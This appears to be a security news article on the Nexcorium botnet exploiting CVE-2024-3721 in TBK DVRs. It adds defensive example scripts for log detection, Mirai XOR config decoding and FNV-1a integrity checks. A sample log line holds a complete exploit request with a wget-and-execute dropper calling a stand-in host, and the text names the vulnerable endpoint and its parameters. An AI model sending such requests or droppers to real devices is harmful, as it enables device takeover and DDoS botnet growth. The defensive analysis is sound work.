A newly identified botnet campaign is actively exploiting a command-injection flaw in TBK digital video recorders (DVRs) to deploy Mirai-based malware known as Nexcorium. The bot is built to launch large-scale distributed denial-of-service (DDoS) attacks, putting online services and infrastructure at risk.
The vulnerability at the core of the campaign is CVE-2024-3721, an OS command injection in the web interface of the TBK DVR-4104 and DVR-4216 models, rated with a CVSS 3.1 base score of 6.3 (medium). The score understates the practical exposure: these DVRs are widely deployed, usually run outdated firmware, and routinely keep weak default credentials, so an unauthenticated remote shell on one of them is an easy foothold.
Hackers Exploit CVE-2024-3721 to Infect TBK DVRs With Nexcorium DDoS Malware
TBK DVR devices impacted by this campaign have long been a concern for security researchers. Their widespread deployment in small businesses, retail environments, and various surveillance setups makes them susceptible, especially where regular firmware patching is not a priority.
Once attackers locate an exposed device, they send a single crafted HTTP request to the vulnerable endpoint /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___. The DVR's web service passes the value of the request's mdc parameter to a shell without validating it, and it does so before any authentication check, so one unauthenticated GET request yields remote command execution on the device.
That capability turns camera recorders into nodes of a coordinated attack network. Fortinet's FortiGuard Labs identified and analyzed the campaign, tracing the whole infection chain from the initial exploitation of CVE-2024-3721 through payload delivery to the establishment of persistence.
The analysis confirmed that Nexcorium shares its core architecture with the original Mirai botnet: an XOR-encoded configuration table that keeps C2 addresses and other strings out of plain sight until they are needed, a watchdog module that keeps the malware running, and a DDoS attack module that floods targets with traffic on command.
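The request shape above is also the most reliable network indicator for this campaign. The following detector is an added example, not code from the article or from Fortinet's report: it parses web-server access-log lines in Common Log Format, matches requests to the vulnerable TBK endpoint, and recovers the URL-encoded shell command from the mdc parameter so an analyst can see what was attempted. The log lines and IP addresses are constructed sample data.

```python
"""Flag CVE-2024-3721 exploitation attempts in web-server access logs.

Added example, not part of the original article or Fortinet's report.
Parses Common Log Format lines (constructed sample data below), matches
requests to the TBK DVR endpoint named in the public advisory, and returns
the decoded shell command carried in the mdc parameter.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Indicators from the public vulnerability description: the vulnerable
# endpoint and the magic cmd value that reaches the command-injection path.
VULN_PATH = "/device.rsp"
MAGIC_CMD = "___S_O_S_T_R_E_A_MAX___"

# Common Log Format: host ident user [time] "METHOD TARGET PROTO" status size
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) '
    r'(?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log: one exploit attempt, one benign probe, one normal hit.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2025:08:14:02 +0000] "GET /device.rsp?opt=sys'
    '&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Bwget%20http%3A%2F'
    '%2F198.51.100.9%2Fbins%2Fsh%20-O%20a%3Bchmod%20777%20a%3B.%2Fa HTTP/1.1" 200 112',
    '198.51.100.22 - - [10/Mar/2025:08:14:05 +0000] "GET /device.rsp?opt=user&cmd=list HTTP/1.1" 401 0',
    '192.0.2.15 - - [10/Mar/2025:08:15:11 +0000] "GET /index.html HTTP/1.1" 200 2048',
]


def analyse_request(target):
    """Return the injected command if `target` is a CVE-2024-3721 probe, else None.

    The published exploit shape is opt=sys&cmd=<magic>&mdb=sos&mdc=<shell>.
    Only the path, opt=sys and the magic cmd are required here, because
    attackers vary the remaining parameters.
    """
    parts = urlsplit(target)
    if parts.path != VULN_PATH:
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)  # parse_qs also URL-decodes
    if qs.get("opt", [""])[0] != "sys" or MAGIC_CMD not in qs.get("cmd", []):
        return None
    # mdc carries the OS command; report a marker if the probe omitted it
    return qs.get("mdc", ["<no mdc parameter>"])[0]


def scan_log(lines):
    """Return [(source_ip, decoded_command)] for every matching log line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not CLF, or truncated; skip rather than guess
        cmd = analyse_request(m.group("target"))
        if cmd is not None:
            hits.append((m.group("src"), cmd))
    return hits


if __name__ == "__main__":
    for src, cmd in scan_log(SAMPLE_LOG):
        print(f"CVE-2024-3721 attempt from {src}: {cmd}")
```

The decoded command in the sample (change to /tmp, fetch a binary, chmod, execute) is the classic Mirai dropper one-liner; in a real log you would feed the download host straight into your blocklist and check whether the DVR's own outbound traffic shows the fetch succeeding.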
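To show what the XOR-encoded configuration table means in practice, here is an added example that reproduces the original Mirai table scheme; it is not Nexcorium's or Fortinet's code. Leaked Mirai source unlocks each entry by XORing every byte with the four bytes of the key 0xDEADBEEF in turn, which collapses to a single-byte XOR with 0x22. Whether Nexcorium keeps that exact key is an assumption made here; the table contents are constructed sample data.

```python
"""Mirai-style XOR configuration table: lock, unlock, and analyst recovery.

Added example, not Nexcorium's or Fortinet's code. Original Mirai's table.c
XORs each config byte with k1, k2, k3, k4 (the bytes of the 32-bit key) in
sequence; since XOR is associative that is one XOR with k1^k2^k3^k4.
"""
import re

# Assumed: the key from the leaked Mirai source. Not confirmed for Nexcorium.
MIRAI_TABLE_KEY = 0xDEADBEEF


def key_bytes(key):
    """Split a 32-bit key into its four bytes, least significant first."""
    return [(key >> shift) & 0xFF for shift in (0, 8, 16, 24)]


def effective_key_byte(key=MIRAI_TABLE_KEY):
    """The four sequential XORs reduce to a single byte (0x22 for 0xDEADBEEF)."""
    k1, k2, k3, k4 = key_bytes(key)
    return k1 ^ k2 ^ k3 ^ k4


def toggle(data, key=MIRAI_TABLE_KEY):
    """Mirai table_lock/table_unlock; symmetric, so it both encodes and decodes."""
    k = effective_key_byte(key)
    return bytes(b ^ k for b in data)


# Constructed sample entries in the spirit of Mirai's table.h identifiers.
SAMPLE_TABLE = {
    "TABLE_CNC_DOMAIN": b"cnc.example.invalid",
    "TABLE_KILLER_PROC": b"/proc/",
    "TABLE_SCAN_CB_DOMAIN": b"report.example.invalid",
}


def lock_table(table, key=MIRAI_TABLE_KEY):
    """Encode every value (plus its NUL terminator) as it would sit in .data."""
    return {name: toggle(value + b"\x00", key) for name, value in table.items()}


def unlock_entry(locked_value, key=MIRAI_TABLE_KEY):
    """Decode one entry on demand, the way the bot does just before use."""
    return toggle(locked_value, key).rstrip(b"\x00")


def recover_strings(blob, key=MIRAI_TABLE_KEY, min_len=4):
    """Analyst helper: XOR a dumped data blob with the key and pull printable runs,
    which is what `strings` cannot do on the raw (locked) binary."""
    plain = toggle(blob, key)
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, plain)]


if __name__ == "__main__":
    locked = lock_table(SAMPLE_TABLE)
    blob = b"".join(locked.values())
    print("effective key byte: 0x%02x" % effective_key_byte())
    print("raw blob strings:  ", recover_strings(blob, key=0))
    print("decoded strings:   ", recover_strings(blob))
```

Because the obfuscation is a constant single-byte XOR, a sweep of all 256 key bytes over a dumped data section recovers the C2 hostname in well under a second, which is why the configuration table frustrates only the most superficial static triage.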
Fortinet observed that upon execution, the malware displays a distinct message: “nexuscorp has taken control.” This appears to be a deliberate signature embedded by the threat actors, announcing their successful compromise of the infected device.
The campaign's reach extends beyond TBK DVRs. Researchers also observed Nexcorium targeting end-of-life home routers through a different vulnerability, CVE-2017-17215, a remote command-injection flaw in the UPnP service of Huawei HG532 routers that Mirai derivatives have abused since 2017, which widens the pool of potentially infected devices.
This dual-target approach points to a deliberate effort to build a broad, heterogeneous botnet. By compromising hardware that organizations and home users are unlikely to update or replace promptly, the operators gain attack infrastructure that is both larger and harder to dismantle.
Together, these compromised devices can generate massive traffic floods against online services, businesses, and even critical infrastructure, disrupting operations and causing significant damage.
Compromised DVRs and routers run around the clock and sit on ordinary residential or business IP addresses, so the botnet's traffic looks like legitimate client traffic to reputation-based filters, complicating efforts to block Nexcorium-driven attacks.
How Nexcorium Establishes Persistence and Evades Detection
Once Nexcorium lands on a TBK DVR, its first priority is to stay there, surviving device reboots and manual clean-up attempts.
The initial exploitation of CVE-2024-3721 retrieves a downloader script. The script identifies the processor architecture of the underlying Linux system and, based on that detection, fetches the matching compiled variant of the malware.
This multi-architecture support means Nexcorium can infect a wide range of Linux-based IoT hardware beyond the initially targeted devices without any change to its code; the downloader simply selects the right build.
With the correct binary running, the malware sets up the persistence and self-protection mechanisms described below.
Fortinet’s research indicated that Nexcorium establishes a command and control (C2) communication channel. This channel empowers the botnet operator to issue DDoS commands, monitor the status of compromised devices, and push further instructions directly to the infected nodes.
Further strengthening its hold, the malware runs a watchdog process. This process continuously monitors the main payload process, automatically restarting it if any interruption occurs.
A notable self-protection feature identified by Fortinet is the use of the FNV-1a hash to verify the integrity of the malware's own binary. If the file on disk has been tampered with or can no longer be read, for example after a partial deletion or antivirus intervention, the malware copies itself under a new filename to re-establish its presence.
Beyond self-preservation, Nexcorium actively spreads. It runs aggressive Telnet brute-force attacks against other devices on the local network and across the internet, using a hardcoded list of common default credentials, so it propagates without further input from the operator.
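FNV-1a is a small, fast, non-cryptographic hash, which is exactly what a bot wants for checking whether its own file has been truncated or partly overwritten. The following added example, not Nexcorium's or Fortinet's code, implements the 32- and 64-bit variants of the public Fowler/Noll/Vo algorithm and shows how an on-disk image is compared against a stored hash; the stand-in "binary" and the expected-hash bookkeeping are constructed here.

```python
"""FNV-1a hashing used as a self-integrity check.

Added example, not Nexcorium's code. Implements the public-domain FNV-1a
algorithm (32- and 64-bit) and a check that distinguishes an intact image
from a truncated, patched or unreadable one, as the article describes.
"""
FNV32_PRIME, FNV32_OFFSET = 0x01000193, 0x811C9DC5
FNV64_PRIME, FNV64_OFFSET = 0x100000001B3, 0xCBF29CE484222325


def fnv1a_32(data):
    """FNV-1a: XOR the byte in, then multiply by the prime (mod 2^32)."""
    h = FNV32_OFFSET
    for b in data:
        h ^= b
        h = (h * FNV32_PRIME) & 0xFFFFFFFF
    return h


def fnv1a_64(data):
    """Same structure with the 64-bit offset basis and prime."""
    h = FNV64_OFFSET
    for b in data:
        h ^= b
        h = (h * FNV64_PRIME) & 0xFFFFFFFFFFFFFFFF
    return h


def integrity_check(on_disk, expected_hash):
    """True only if the image is readable and hashes to expected_hash.

    `on_disk` is the file's bytes, or None when reading failed (deleted,
    permission denied, or partially unlinked by a cleanup tool).
    """
    if on_disk is None:
        return False
    return fnv1a_32(on_disk) == expected_hash


def demo():
    """Constructed stand-in for a bot binary, plus the failure modes the check catches."""
    image = b"\x7fELF" + bytes(range(256)) * 4  # constructed, not a real ELF
    expected = fnv1a_32(image)  # a real bot embeds this at build time
    return {
        "intact": integrity_check(image, expected),
        "truncated": integrity_check(image[:-1], expected),
        "patched": integrity_check(image[:10] + b"\x90" + image[11:], expected),
        "unreadable": integrity_check(None, expected),
    }


if __name__ == "__main__":
    print("fnv1a_32('foobar') = 0x%08x" % fnv1a_32(b"foobar"))
    for case, ok in demo().items():
        print(f"{case:>10}: {'passes' if ok else 'fails'} integrity check")
```

The check only defends against accidental or clumsy damage: FNV-1a is not collision resistant, so an analyst who can patch the binary can also patch the expected value or the comparison. For a defender's own integrity monitoring, use a cryptographic hash such as SHA-256; the point of the example is to show what the malware is doing, not to recommend the construction.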
Organizations and individuals using TBK DVR-4104 or DVR-4216 devices are strongly advised to replace them with currently supported models. The vendor has not released a patch for CVE-2024-3721 and the devices are end-of-life from a security standpoint, so their continued use, especially on an internet-reachable address, is an unacceptable risk.
Likewise, any routers still running firmware vulnerable to CVE-2017-17215, such as unpatched Huawei HG532 units, should be retired and replaced with supported alternatives.
Network administrators should ensure that every internet-facing IoT device uses strong, unique credentials rather than factory defaults. This matters here in particular because Nexcorium's brute-force module targets exactly the devices still configured with common default passwords.
Network segmentation is also strongly recommended: isolating DVRs and other surveillance hardware from critical internal systems limits what an attacker can reach if a device is compromised.
Finally, disable remote access to DVR management interfaces that do not genuinely need to be reachable from outside. Keeping the web interface off the internet removes the attack surface this campaign exploits, and it is one of the most effective measures available.